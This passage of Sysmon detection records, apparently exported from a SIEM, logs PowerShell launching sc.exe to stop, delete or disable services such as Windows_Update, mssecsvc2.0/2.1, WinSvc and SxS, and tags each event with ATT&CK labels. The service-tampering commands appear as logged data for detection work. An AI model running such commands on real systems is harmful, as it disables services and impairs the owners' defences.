Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:35.452"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001057a43000}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.625",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.398 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001001a23000} +ProcessId: 2780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.401053300Z"",""eventRecordID"":""3823"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.398\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001001a23000}\r\nProcessId: 2780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.398"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001001a23000}"",""processId"":""2780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.596",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.356 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00104ea03000} +ProcessId: 360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.359500300Z"",""eventRecordID"":""3821"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.356\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00104ea03000}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.356"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00104ea03000}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.577",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.329 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010879f3000} +ProcessId: 6920 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.333330700Z"",""eventRecordID"":""3820"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.329\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010879f3000}\r\nProcessId: 6920\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.329"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010879f3000}"",""processId"":""6920"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.516",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:52:35.248 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00100c9d3000} +ProcessId: 4248 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.251634200Z"",""eventRecordID"":""3817"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.248\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00100c9d3000}\r\nProcessId: 4248\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.248"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00100c9d3000}"",""processId"":""4248"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 
-NoProfile""}}}", +"May 29, 2020 @ 14:21:03.476",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.197 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010919a3000} +ProcessId: 8160 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.200716700Z"",""eventRecordID"":""3814"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.197\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010919a3000}\r\nProcessId: 8160\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager 
Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.197"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010919a3000}"",""processId"":""8160"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.452",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.170 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010ca993000} +ProcessId: 8096 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SxS Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SxS Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.177071400Z"",""eventRecordID"":""3813"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.170\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010ca993000}\r\nProcessId: 8096\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SxS Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 